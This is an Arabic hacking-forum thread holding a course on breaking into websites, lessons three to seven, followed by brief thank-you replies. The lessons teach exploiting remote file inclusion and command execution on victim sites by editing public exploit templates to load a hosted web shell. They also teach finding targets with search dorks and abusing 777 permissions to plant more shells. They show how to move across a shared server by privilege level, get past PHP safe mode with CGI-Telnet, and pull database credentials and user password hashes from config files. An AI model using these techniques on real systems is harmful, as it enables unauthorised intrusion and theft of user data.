![]() |
![]() |
![]() |
التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"
مطلوب مشرفين على كامل اقسام المنتدى
|
|
![]() |
|
|
|
![]() |
|
![]() |
|
|
أدوات الموضوع | انواع عرض الموضوع |
|
|
المشاركة رقم: 1 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||
شكراً: 0
تم شكره 18 مرة في 12 مشاركة
|
الدرس الاول بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته تحدثنا في الدروس السابقة عن مفاهيم أختراق المواقع وعن أوامر الينكس وسيكون درسنا الثالث: البحث عن الثغرات الجديده ورفع الشل (الأختراق العشوائي) بداية درسنا هذا ندخل في الجد لتطبيق ماتعلمناه في الدرسين السابقه وبالأخص تطبيق الأوامر لتطبيق الأوامر الي تعلمتها تحتاج شل .. والشل لابد تزرعة على موقع عن طريق ثغرات الريموت وهي Remote File Include commands execution وهذي النوعية من الثغرات خــطــيرة جداً والسبب انها تنفذ اوامر على السيرفر وممكن تسيطر على الموقع بشكل كامل طبعاً يوجد ثغرات اخرى للمواقع لاكن ليست بمستوى هالنوعيه وباقي الثغرات اقل خطوره نوضح طريقه عمل نوعية الثغرتين مع تطبيق عملي تجربة بنفسك ((Remote File Include)) طريقه عمل هذي الثغرات هي ربط الشل مع الموقع وهي اكثر الثغرات انتشار الأن مثال على شكل استثمار الثغرة []? -| نفصل الرابط |- موقع الضحية: [] الملف المصاب بالثغرة: index.php?asdely= ملف الشل: [] وبعد التنفيذ اذا الثغرة موجوده والموقع مصاب بها راح تشوف عرض لك الشل .. وهنا يجي وقت تنفيذ الأوامر ومثل ماتشوف ان رابط الشل جا بعد علامة " = " ايضاً لابد ان يكون الشل بأمتداد .txt يعني ملف نصي وبعد رابط الشل تضع علامة استفهام " ? " اما النوعية الثانية ((Remote commands execution)) طريقة عمل هذه النوعية من الثغرات هي تنفيذ الأوامر على طول بدون ماتحط رابط الشل مثال على شكل استثمار الثغرة www.google.com/index.php?cmd=ls -la -| نفصل الرابط |- موقع الضحية: [] الملف المصاب بالثغرة: index.php?cmd= احد اوامر الينكس: ls -la وبعد التنفيذ اذا الثغرة موجودة فعلاً راح تشوفه يعرض لك في المتصفح نتيجه الأمر المنفذ ولو نفذت مثلاً امر ls -la راح يعرض لك الملفات والمجلدات والتصاريح في المتصفح وبشكل غير مرتب يصعب التفرقه بين الملفات والمجلدات ولعرضها بشكل مرتب مثلاً في متصفح الأكسبلور .. من الأعلى تضغط على "عرض" ثم تختار من القائمة "المصدر" وراح يعرض لك نتيجه الأمر في ملف نصي وبيكون بشكل مرتب [ثغرة للتطبيق] تم إزالة التطبيق بسبب أحد الأطفال طبعاً مكان id مثل ماقلنا نكتب الأوامر يوجد شرح سريع بالفديو في المرفقات بأسم (r-c-e) بعد ماعرفنا طريقه عمل ثغرات الريموت ننتقل الى كيفية ايجاد الثغرات الجديدة بأستخدام موقع milw0rm رابط الموقع http://www.milw0rm.com/ من هذا الموقع راح نتابع احدث ثغرات المواقع بعد الدخول الى الموقع شاهد الصوره لمعرفة كيفية إيجاد ثغرات المواقع مثال على ثغرة فايل انكلود "Remote File Include" من موقع milw0rm Exhibit Engine <= 1.22 (styles.php) Remote File Include Vulnerability -| تفصيل العنوان |- اسم السكربت: Exhibit Engin اصدار السكربت: 1.22 الملف المصاب بالثغرة: styles.php نوع الثغرة: Remote File Include طبعاً لمشاهدة الأستثمار للثغرة تضغط على عنوانها وراح تفتح لك صفحة ثانية فيها كود الثغرة وأسم المكتشف ...الخ والي يهمنا هو "استثمار الثغرة" ويوجد بداخل الصفحة مصطلحات بسيطة وتختلف من ثغرة الى اخرى وسنقوم بتوضيحها بالتفصيل ان شاء الله المصطلحات التي تدل على استثمار الثغرة Example: Expl: Exploit: Exploits: وجميع هذي المصطلحات تعني الأستثمار وتجد اسفلها او بجانبها شكل الأستثمار للثغرة مثال على احد المصطلحات: http://www.milw0rm.com/exploits/2850 يوجد بالأسفل Expl: http://www.site.com/[ee_path]/styles.php?toroot=[evil_scripts] اذاً على طول نفهم ان الأستثمار للثغرة هو: http://www.site.com/[ee_path]/styles.php?toroot=[evil_scripts] وطبعاً الأستثمار لابد نعدل عليه بعض الأشياء مثل اسم الموقع نغيره الى الموقع الي لقينا فيه الثغرة وايضاً اسم مجلد السكربت ورابط الشل ويوجد مصطلحات للأستثمار نفسه ولابد نعرفها عشان نعرف كيف نعدل الأستثمار وراح أقسمها الى مجموعات: المجموعة الأولى http://www.site.com/ [target] [site] [namesite] [url] - جميعها تدل على عنوان موقع الضحية - مثال على أحد مصطلحات عنوان الموقع: Example: http://[site]/modules/NukeAI/util.php?AIbasedir=[php shell] المصطلح المكتوب في الأستثمار هو [site] ومثل ماذكرنا انها تدل على عنوان موقع الضحيه نفرض ان الموقع المستهدف هو [] راح يكون التعديل على الأستثمار بهذا الشكل [][php shell] المجموعة الثانية /[scripts]/ /[path]/ /[dir]/ /[folder]/ طبعاً ممكن تحدث بعض التغيرات مثلاً يكون شكل المصطلح /[path_asdely]/ مب شرط يكون مطابق لما ذكر - جميعها تدل على اسم مجلد السكربت المصاب بالثغرة - مثال على أحد مصطلحات أسم مجلد السكربت المصاب: http://[target]/[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill المصطلح كما هو في الأستثمار [path] وهذا المصطلح من ضمن مصطلحات اسم مجلد السكربت المصاب بالثغرة نفترض ان اسم مجلد السكربت المصاب هو asdely وعنوان الموقع المستهدف هو [] يكون شكل الأستثمار بعد التعديل: [][templatesDirectory]=evill ومن المعروف ان الأسم الذي يكون بين علامتين السلاش "/ /" في الرابط معناته مجلد المجموعة الثالثة [SHELLURL] [evil] [shell] [yourevil] [evil_scripts] [cmd] [php shell] - جميعها تدل على رابط الشل - دائماً تجد هذه المصطلحات في أخر الأستثمار مثال على أحد مصطلحات رابط الشل: http://www.site.com/[ee_path]/styles.php?toroot=[evil_scripts] نفترض أن عنوان الموقع المستهدف هو [] واسم مجلد السكربت المصاب alkaser وعنوان الشل []? يكون شكل الأستثمار بعد التعديل: []? الأن الأستثمار عدل عليه بشكل كامل وهو جاهز للأستعراض طبعاً الشل مثل ماذكرنا يكون بأمتداد txt وانت تقوم برفعه على اي مساحة او مركز تحميل يسمح بالأمتداد txt ثم تستخدمة في الأستثمارات بشكل دائم المطلوب فعله مع جميع استثمارات ثغرات فايل انكلود: 1- عنوان الموقع المستهدف 2- اسم مجلد السكربت المصاب 3- رابط الشل بأمتداد txt بعد توفر هذي الثلاث اشياء تقوم بالتعديل على الأستثمار ثم تستعرضه في المتصفح ان عرض لك الشل معناته السكربت مصاب والمطلوب منك تنفيذ الأوامر وان لم يعرض لك الشل معناته السكربت تم ترقيعه من الثغره وهو غير مصاب ايضاً ممكن يعرض لك الشل اليوم تجي بكره تبي تسوي شي او تنفذ كم امر تستعرض الرابط وتلقاه ماعرض لك الشل مع انه في الأمس كان شغال الشل .. على طول تعرف ان السكربت تم ترقيع الثغره الي فيه طبعاً جميع كلامنا السابق المقصود به هو ثغرات Remote File Include لأن مثل ماذكرت بأول الموضوع انها منتشره وبشكل كبير أما Remote commands execution قليله ثغراتها وطريقة البحث عن السكربت المصاب تكون بنسخ اسم السكربت ثم البحث عنه في قوقل او اي محرك بحث أخر نفترض اننا نبي نبحث عن هذي الثغرة Messagerie Locale (centre.php) Remote File Inclusion Vulnerability نقوم بنسخ اسم السكربت وهو Messagerie ولصقه في محرك البحث قوقل ثم تقوم بتجهيز الأستثمار والتجربة في النتايج الي طلعها لك محرك البحث ايضاً يوجد بعض الثغرات موفر لنا طريقة البحث عن الثغرة وفي الغالب تكون امام هذا المصطلح (( Dork : )) مثال على المصطلح: http://www.milw0rm.com/exploits/2832 وهذا المصطلح وكلمة البحث تبع السكربت المصاب Dork : inurl:indexmess.php كل الي عليك تنسخ inurl:indexmess.php وتلصقه في محرك البحث قوقل ثم تقوم بالبحث وللمعلومية هذي الثغرة هي نفسها Messagerie Locale (centre.php) Remote File Inclusion Vulnerability بأمكانك البحث عن اسم السكربت: Messagerie او اسم البحث الجاهز: inurl:indexmess.php تحياتي للجميع الدرس الرابع التصاريح بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته درسنا الرابع عن || التصاريح او التراخيص || ومن هذا الدرس نبدأ بدروس مابعد رفع الشل كثير مننا يسمع هذي الكلمتين "تصاريح - تراخيص" ويعتقد انها تختلف وفي الأصل معناها واحد وهي تتعلق بخصائص الملف او المجلد ويطلق عليها بالأنجليزي Permissions . ماهي التصاريح "Permissions"؟ هي احد خصائص الملفات و المجلدات التي يضعها مالك الموقع او السيرفر على ملفاته لحمايتها. كيف تعمل هذه التصاريح؟ يضع المالك التصاريح على ملفاته بحيث عند وصول اي مستخدم اخر لهذه الملفات لا يستطيع الأستفاده منها بشكل كامل في الغالب التصاريح تكون على النحو التالي: 1- تصاريح تمكنك من قراءة محتوى الملف فقط دون أي تعديل. 2- تصريح يمكنك فعل ماتريد على الملف من [تعديل - تغيير التسميه - نسخ - نقل - حذف - تشغيل]. 3- تصاريح تمنعك من فعل كل ماذكر في رقم 1 و 2 وفي الغالب هذي التصاريح تكون على الملفات المهمه جداً. ماهو شكل التصريح؟ هو رقم من ثلاث خانات ويوجد لكل تصريح رمز معين لا يتغير مثال: هذا احد التصاريح: 777 ماهي الفائدة من معرفة تصريح الملف؟ عند معرفة التصاريح تستطيع تحديد ماتريد فعله في الموقع لأن التصاريح تقوم بدور كبير في حماية الموقع ويجب عليك معرفة التصريح الذي يمكنك من فعل الكثير وهو التصريح (777) لأن هذا التصريح هو المقصود في رقم 2 وعند وجود هذا التصريح على ملف او مجلد يمكنك من التعديل و النسخ و...الخ. كيف استفيد من التصريح 777 عند وجوده على (مجلد)؟ تستطيع رفع ملفات مثل رفع شل اخر بداخل هذا المجلد وتستطيع تعديل كل الملفات التي بداخل هذا المجلد ايضاً تستطيع نسخ اي ملف أخر ووضعه بداخل هذا المجلد ... والكثير كيف استفيد من التصريح 777 عند وجوده على (ملف)؟ تستطيع تبديل محتوى الملف مثلاً بكود اي شل ... متى نتجاهل التصاريح ؟ اذا كانت ((( صلاحياتنا ))) على السيرفر يوزر .. وسوف يخصص درس كامل عن الصلاحيات إن شاء الله امر تغيير التصاريح كما ذكرناه في الدروس السابقه هو: chmod 777 file.php تفصيل الأمر chmod= ثابته وهي لتغيير التصريح 777= تتغير على حسب حاجتك وطبعاً تستبدلها بالتصريح الذي تريد file.php= تستبدلها بأسم الملف أو المجلد المراد تغيير تصريحه -|خلاصة الدرس|- هو التركيز على التصريح 777 عند اختراق اي موقع لأنه راح يفيدك كثير ان شاء الله للمزيد من المعلومات راح اتعمق أكثر في التصاريح ((ليس مهم جداً أن تفهم التفاصيل الي بتذكر الأن)) لاكن للفائدة فقط وزيادة المعلومات نفترض انك شفت هذا التصريح ( 777 ) على ملف وذكرنا انه يرمز إلى -rwxrwxrwx وانت تبي تعرف شلون جا الرمز بهذا الشكل -[ نفصل الرمز ]- - << كما ذكرنا في الدروس السابقه ان الملفات تبدا بـ شرطه والمجلدات تبدا بحرف d راح اوضح كيف عرفت ان الرمز rwx rwx rwx يعني 777 في الأصل الحروف r w x تعني: r = 4 w = 2 x = 1 ولو جمعنا 4+2+1= 7 ولأن rwx مكرره ثلاث مرات اصبح 777 طيب لو شفنا هذا التصريح rwxr-xr-x على ملف وش بيكون الرقم ؟ نفصله [ rwx r-x r-x ] ايضاً اذا وجد في الرمز علامة (-) يساوي 0 يعني صفر ماينحسب نشوف وش بيكون شكل الرقم rwx = 4+2+1=7 r-x = 4+0+1=5 r-x = 4+0+1=5 مثل ماتشوفون رقم التصريح طلع 755 وبهذي الطريقة تعرف الأرقام طيب البعض يقول ليش يتكرر الرقم ثلاث مرات وليش انا اقسم الرمز الى ثلاث اقسام مثل (rwx rwx rwx) rwx rwx rwx 3 2 1 1= تصريح مالك الملف 2= تصريح مجموعة مالك الملف 3= تصريح المستخدمين الأخرين اي ان التصريح مقسم الى ثلاث اقسام وكل قسم يخص مستخدم أو مجموعة مستخدمين طيب مامعنى الحروف r و w و x ؟ r= قراءة w= كتابة x= تنفيذ اي عندما نشاهد rwxrwxrwx تعني الجميع لهم التحكم الكامل من قراءة و كتابة و تنفيذ وعندما نشاهد rwxr-xr-x تعني ان مالك الملف له التحكم الكامل " rwx" ومجموعة المالك تستطيع القراءة والتنفيذ فقط "r-x" والأخرين يستطيعون القراءة والتنفيذ فقط "r-x" تحياتي الدرس الخامس الصلاحيات بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته حياكم الله اخواني كل عام وانتم بخير .. والله يتقبل منا ومنكم صالح الأعمال اتمنى اني افدتكم في الدروس السابقه واليوم نعود لكم بدرس جديد وهو الدرس الخامس درسنا الخامس عن: || الـصـلاحـيـات || الصلاحيات هي حالة المخترق بعد رفع الشل على أحد المواقع وهي تخص حماية السيرفر وقدرتك على التحكم والتنفيذ في الشل وفي الغالب تكون إحدى هذه الصلاحيات إما (نوبدي) أو (يوزر) أو (اباتشي). مافائدة معرفة الصلاحيات ؟ بعد معرفة صلاحيتك على السيرفر تستطيع تحديد ماتريد فعله والتخطيط لكيفية الوصول إلى الهدف لأن من صلاحيه إلى صلاحيه يوجد اختلافات ويوجد عوائق تواجهك في الأختراق. من الذي يتحكم بهذي الصلاحيات ؟ مدير السيرفر والذي يسمى بـ (root) .. فقد تجد سيرفر بعد زرع الشل أن صلاحيتك nobody وقد تجد سيرفر أخر صلاحيتك فيه غير ذالك أي أن الصلاحيات تختلف من سيرفر إلى سيرفر على حسب حمايته وعلى حسب مايحدده مدير السيرفر. كيف تعرف صلاحيتك على السيرفر ؟ تستطيع من الشل مباشرة وهذي صوره توضح مكان تواجد الصلاحيات وهي (نوبدي) [] أو تقوم بتنفيذ أمر "id" في الشل لأضهار الصلاحيات مثل ماذكرنا في الدروس السابقه ذكرت ثلاث انواع من الصلاحيات وراح نتكلم عن كل نوع بالتفصيل ان شاء الله 1- نوبدي (nobody) في الكثير من السيرفرات تجد هذي الصلاحية ومن رأيي هي أفضل الصلاحيات لجمع أكبر قدر من المعلومات في السيرفر ::مميزاتها:: تمكنك التنقل في السيرفر من موقع إلى أخر وتستفيد من هذي الميزة في زرع المزيد من ملفات التجسس لضمان بقائك على السيرفر لمدة أطول يوجد شرح عملي في المرفقات بأسم (nobody) على سيرفر صلاحياتي فيه nobody راح اوضح عليه كيفية التنقل من موقع إلى أخر. -أخلي الباقي في الأستفادة من النوبدي على تفكيرك وقت الإختراق لأنك تستطيع فعل الكثير !! 2- يوزر هذه الصلاحيه من الصلاحيات المعقده نوعاً ما .. في بعض الأحيان تكون من احلى مايكون وجودها وبعض الأحيان زراعتك للشل مثل عدمه (إن كان هناك هدف معين على السيرفر) مثال بسيط لمعرفة شكل صلاحيات اليوزر نفترض أن مسارك بعد رفع الشل هكذا : / home / asdely / public_html / ونضرت إلى الصلاحيات ولقيتها بهذا الشكل: uid=906(asdely) gid=906(asdely) groups=906(asdely) كما تشاهد ان الي بين الأقواس "asdely" هو نفس اليوزر الي في المسار المفترض في هالحاله على طول تعرف أن صلاحياتك يوزر !! *ملاحظه: 906= هذا الرقم متغير وليس ثابت ممكن يتغير إلى أي رقم أخر :: مميزاتها :: انك ماتحتاج إلى تصريح 777 أو غيره عشان تعدل على ملف او ترفع ملف .. الخ لأن اذا شفت هذي الصلاحيات معناته كأنك مدير الموقع الي أنت عليه وتقدر تنفذ أي شي تبيه !! :: عيوبها :: ماتقدر تتنقل إلى باقي المواقع الي على السيرفر او تشوف أي معلومه منها فقط تستطيع فعل كل شي في الموقع الي أنت عليه .. أن كان هو هدفك .. معناته راح خبر كان : ) وأن كان هدفك على نفس السيرفر وتبي توصله من الشل الي رفعته .. فللأسف مالك الا أنك تبحث عن ثغرات في نفس الهدف لأن من الشل الي رفعت ماتقدر توصله ولا تقدر توصل لغيره . يوجد شرح عملي في المرفقات بأسم (user) للتطبيق على شل صلاحيات يوزر. -اتمنى محد ياخذ كلامي فقط ويترك عقله .. فكر يمكن تتخطى هذي المشكلة او يوجد ثغرة تتعدا هذي العقبه .. مافيه شي مستحيل !! 3- اباتشي (apache) هذه الصلاحيات شبيهه إلى nobody في التحكم إلا أن مسارك على الشل سيكون شكله مختلف في الغالب - يوجد بعض الصلاحيات تكون شكلها غير الثلاث المذكوره وفي الغالب تكون شبيهه لـ apache تعامل معها مثل الأباتشي. *تنبيه: لا تعتمد على تجربة في اي سيرفر وتثبتها في عقلك سواء كانت بنتيجه مفيده او غير مفيده لأن سيرفر عن سيرفر تختلف حمايتة !! تحياتي الدرس السادس الوضع الامن بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته حياكم الله أخواني اليوم ناخذ درس جديد وأن شاء الله يستفيد منه الجميع درسنا السادس عن: || الوضع الأمن - Safe Mode || يقف الكثير منا بعد مايزرع الشل اذا شاف الـ safemode = On وهي تعني أن الوضع الأمن مفعل وراح يسبب لك بعض العوائق في الأختراق والوصول إلى المعلومات لاكن ضهرت ثغرات الـ php التي تمكننا من تخطي هذي العوائق وسوف نتطرق لها في درسنا ان شاء الله أولاً: ماهو السيف مود (Safe Mode)؟ هي حماية موجودة داخل مترجم الـ php وعند تفعيله يمنعك من فعل اشياء كثيرة بسبب تعطيل دوال الـ php التي تسبب خطر على السيرفر مثل الدوال التي من خلالها تستطيع تنفيذ الأوامر . ثانياً: لماذا تختفي خانة تنفيذ الأوامر في الشل عندما يكون السيف مود مفعل؟ مثل ماذكرنا أن عند تفعيل السيف مود تتعطل الدوال الخطيرة على السيرفر الموجوده في لغة البرمجه php والتي في الغالب يكون ملف التجسس مبرمج بواسطتها وسبب أختفاء سطر الأوامر هو تعطيل الدوال التي يمكن تنفيذ الأوامر من خلالها مثل (system , shell_exec , exec) وغيرها مع العلم أن بإمكان مدير السيرفر إضافة المزيد من الدوال لتعطيلها وأي دالة تعطل يصير مالها مفعول ولا تأدي وظيفتها في السيرفر وفي هذي الحالة تزيد حماية السيرفر ويصعب عليك تنفيذ الأوامر وجمع المعلومات. ويسأل البعض هل عند وجود الوضع الأمن مفعل والصلاحيات نوبدي او اباتشي يمنعني من التنقل والوصول إلى ملفات المواقع الأخرى؟ الجواب لا .. لأن ممكن الوصول الى ملفات المواقع الأخرى وقرائتها وليس بشرط أن ترى محتوى الموقع لاكن المطلوب هو معرفة (مسارات الملفات) التي ممكن من خلالها جمع معلومات تفيدك في الأختراق مثل ملف config الذي في الغالب يحفظ بداخله معلومات قاعدة بيانات السكربت.. وان شاء الله راح اخصص لهذي النقطه درس عند الحصول على معلومات أي قاعدة بيانات كيف استفيد منها ؟ بالأمكان رفع سكربت اتصال بقواعد البيانات مثلما رفعت ملف التجسس في البداية وفي هذي الحالة تتصل بالقاعدة التي تملك معلوماتها وبعد ذالك بالأمكان محاولة زرع الشل في القاعدة وعند زراعتة يمكنك من مشاهدة محتوى الموقع بأذن الله .. وعند عمل هذي الطريقة بالأمكان الأنتقال إلى الموقع المستهدف إن شاء الله وفي الغالب تستخدم هذي الطريقه إن كان هناك هدف ما على السيرفر تبي توصل له !! بعد القليل من الأستفسارات ننتقل إلى معرفة المزيد عن السيف مود صورة لمعرفة مكان حالة السيف مود في الشل safe_mode وهي تعني حالة الوضع الأمن وسيكون أمامها (On) أو (Off) Disable functions وهنا يعرض لنا الدوال المعطله وسوف تجد امامها إما (الدوال) أو كلمة (NONE) وهي تعني أنه لايوجد دوال معطلة ذكرت أن بالأمكان تخطي الوضع الأمن بأستخدام ثغرات الـPHP مثل دالة copy و CURL و id ...الخ ويوجد الكثير منها في الشل المطور من الأخ المهاجر22 البعض يريد سطر الأوامر في حالة تفعيل الوضع الأمن ليقوم بتنفيذ بعض الأوامر الخارجية التي يحتاجها في الأختراق هنا تقف على شرطين لتنفيذ هذا الشي: 1- الحصول على معلومات FTP لأي موقع على السيرفر 2- يوجد أمكانية لتشغيل سكربت CGI-Telnet في السيرفر لأن بعض السيرفرات لا تستطيع تشغيل هذا السكربت الشرط الأول بيد المخترق وشطارته في جميع المعلومات أما الشرط الثاني بيد مدير السيرفر "root" إذا السيرفر يسمح لتشغيل سكربت CGI-Telnet فأنت تستطيع تنفيذ الأوامر بأستخدام هذا السكربت :: طريقة استخدام CGI-Telnet :: أول شي تتصل بالموقع الي معك معلوماته عن طريق أحد برامج الـftp ثم تدخل على مجلد public_html وتقوم برفع السكربت بداخل مجلد cgi-bin أي سيكون مسار السكربت : / home / ××× / public_html / cgi-bin / cgi-telnet.pl cgi-telnet.pl= السكربت بعد رفع السكربت تعطيه تصريح 755 ومن ثم تستعرضه في المتصفح راح يكون الرابط بهذا الشكل: http://www.××××.com/cgi-bin/cgi-telnet.pl http://www.××××.com/ = الموقع cgi-bin = المجلد الي رفعنا بداخله سكربت CGI-Telnet cgi-telnet.pl = سكربت CGI-Telnet إذا أشتغل السكربت معناته تمام بالأمكان تنفذ الأوامر الي تحتاجها طبعاً ماذكر أعلاه الطريقة بأختصار !! تحياتي الدرس السابع والاخير السلام عليكم ورحمة الله وبركاته درسنا السابع عن || كيفية الأتصال بقواعد البيانات والأستفاده منها || أولاً ماهي قواعد البيانات ؟ من أسمها تعرف انه شي يحتفظ بـ البيانات وتوجد هذه القواعد مع كل سكربت لحفظ أي شي يضاف الى السكربت في الغالب كل سكربت يكون له قاعدة بيانات مثل الأن سكربت vBulletin الي نستخدمه في جيوش الهكرز كيف يحفظ المواضيع ؟؟ والعضويات ؟؟ وكل جديد في المنتدى ؟؟ ايضاً كيف إذا حدثت مشكلة أو عطل تسبب في ايقاف المنتدى تلاحظ انه بمجرد استعادة قاعدة البيانات من قبل الإدارة يعود كل شي مثل ماكان عليه والسبب أنه يوجد للسكربت قاعدة بيانات. ثانياً أين توجد قواعد البيانات ؟ قواعد البيانات تكون محفوظه في السيرفر وفي أماكن أمنه وتحمل تصاريح لايمكن الوصول إليها إلا اذا كنت مدير السيرفر (root) ثالثاً هل ممكن الأطلاع على بيانات هذي القواعد .. وكيف ؟ نعم ممكن .. لاكن يشترط عليك توفر ثلاث أشياء للأتصال بـ قاعدة البيانات وهي: 1- معرفة يوزر القاعدة 2- معرفة الباسورد للقاعدة 3- معرفة أسم القاعدة رابعاً أين أجد [ يوز القاعدة + الباسورد + أسم القاعدة ] ؟ تجد هذي المعلومات (في الغالب) داخل ملف يحمل هذا الأسم (config) وهذا الملف طبعاً يكون من ظمن ملفات السكربت الي تبي تتصل بقاعدة بياناته واسم الملف الي بداخله معلومات القاعدة في الغالب يكون احد هذي الأسماء : config.php config.inc.php settings.php وغيرها ... ايضاً في الغالب تجد هذا الملف في المجلد الرئيسي للسكربت أو داخل مجلد اسمه [includes أو include أو inc] خامساً كيف تتصل بقاعدة البيانات بعد حصولك على معلوماتها ؟ يوجد سكربتات خاصة لقواعد البيانات ايضاً يوجد الكثير من الشلات تحمل ميزة الأتصال بقواعد البيانات مثل شل c99 وعند الأتصال بالقاعدة تكون البيانات موجودة بداخل الجداول وبشكل مرتب !! سادساً كيف استفيد من بيانات القاعدة وماهو المهم في جداولها ؟ أكثر شي يهمنا في قاعدة البيانات هو جدول user لأن يوجد بداخله اسماء المستخدمين وباسورداتهم وأيميلاتهم طبعاً الباسوردات في الغالب تكون مشفرة تشفير md5. المصطلحات الموجودة في السكربتات لـ [ يوز القاعدة - باسورد القاعدة - أسم القاعدة ] يوزر القاعدة: username DBUSER db_user dbusername نلاحظ انه يتكرر في المصطلح كلمة (user) --- باسورد القاعدة: password DBPASS db_pass DB_PASSWORD dbpassword --- أسم القاعدة: database dbname db_name dbuname ملاحظة: ليست هذي جميع المصطلحات .. قد تجد مصطلحات غير هذي لاكن راح تكون شبيهه لها ان شاء الله انتهى الدرس وأنتهت الدورة حتى إشعار آخر ملاحظة: جميع صور الدروس تحفظ كمرفق لضمان عدم ضياعها ولكن هذا الدرس لا يوجد فيه صور لذلك لا يوجد مرفق ![]() تحياتي للجميع وعلى الله الكل استفادوا من الدورة تحياتي
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
المشاركة رقم: 2 | ||||||||||||
|
مجهود رائع اخي |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 3 | ||||||||||||
|
مجهود رائع اخي |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 4 | ||||||||||||
|
دورة جميلة لكن من المفروض ان تكون هناك دروس فيديو. |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 5 | ||||||||||||
|
****اااااااا يا غاااااااااااااالي محتاااااااااج هيك دورة من زماااااااان
|
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 6 | ||||||||||||
|
بارك الله فيك اخي العزيز |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 7 | ||||||||||||
|
mercii !!! |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 8 | ||||||||||||
|
![]() |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 9 | ||||||||||||
|
مشكور واصل يابطل |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 10 | ||||||||||||
|
thankssss |
||||||||||||
|
|
||||||||||||
![]() |
| مواقع النشر (المفضلة) |
| حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف) | |
| أدوات الموضوع | |
| انواع عرض الموضوع | |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| تحديث الصفحة دورة كاملة لكشف التلغيم (مؤقت) | انور العراقي | [ مـنتدى حمايه الـبريد الالكتروني | Hacking E-mails ] | 4 | 21/11/2014 13:20 |
| دورة كاملة مع دروس عن الميتا سبلوت | DR.X | [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] | 12 | 09/01/2014 19:37 |
| دورة كامله عن اختراق المنتديات شل+التصاريح+الصلاحيات ارجو التثبيت | DR.X | [ الدورات العامة ] | 8 | 27/09/2013 01:37 |
![]() |
![]() |
![]() |